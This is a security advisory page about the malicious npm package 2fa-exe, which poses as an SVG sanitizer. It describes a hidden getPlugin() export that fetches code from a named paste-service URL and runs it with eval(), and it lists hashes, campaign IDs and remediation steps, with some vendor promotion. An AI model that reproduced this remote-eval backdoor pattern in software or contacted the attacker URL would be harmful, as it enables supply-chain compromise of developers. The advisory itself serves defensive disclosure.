Which versions of 2fa-exe are malicious?

The following npm versions of 2fa-exe are flagged malicious: 1.0.0, 1.0.1. Treat any of these as compromised.

How do I remediate 2fa-exe if I installed it?

Remove 2fa-exe from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is 2fa-exe part of a known attack campaign?

Yes — 2fa-exe is associated with the IN-MAL-2026-006375, IN-MAL-2026-006377, IN-MAL-2026-006374, IN-MAL-2026-006376 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect 2fa-exe in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking 2fa-exe and packages like it before any post-install script runs.

Malicious package

2fa-exenpm

Malicious code in 2fa-exe (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5740

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall 2fa-exe

What this malware does

Package advertises itself as an SVG fetcher/sanitizer but ships an undocumented exported factory getPlugin() in index.js that performs an HTTPS GET to https://www.jsonkeeper.com/b/NGY3C (an anonymous, attacker-mutable JSON-paste service) and passes the response's model field directly to eval(). Any consumer that calls getPlugin() — or any tooling that mass-invokes a package's exports — executes arbitrary JavaScript fetched from a third-party paste at the moment of the call. The remote payload can change at any time without a new package release, so today's benign content provides no assurance about tomorrow's. The package name 2fa-exe also has no relationship to the stated SVG-sanitizer purpose, consistent with bait/lure framing. There is no integrity check, no pinning, and no mention of this behavior in the README.

Malicious versions

2 flagged

1.0.01.0.1

Indicators of compromise (SHA-256)

acf790567380a784696688f56e72fca7d56d6992adf31b7857d34abc242d3485

ae22a4f75735f102ab93f3acb4d6cb97867a2244a2b1235bf3cb1313eaab30c6

d15402567a83c6520335b1f3ce315e10089c9ad19d77d7f82a6890fe3faf99e0

df3ad6044ca4d17d594aa3aa0d1a75d1dbf3ebf483d0dd1b04d502277674a8cc

Frequently asked questions

No. 2fa-exe on npm has been identified as a malicious package (versions 1.0.0, 1.0.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006375IN-MAL-2026-006377IN-MAL-2026-006374IN-MAL-2026-006376

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection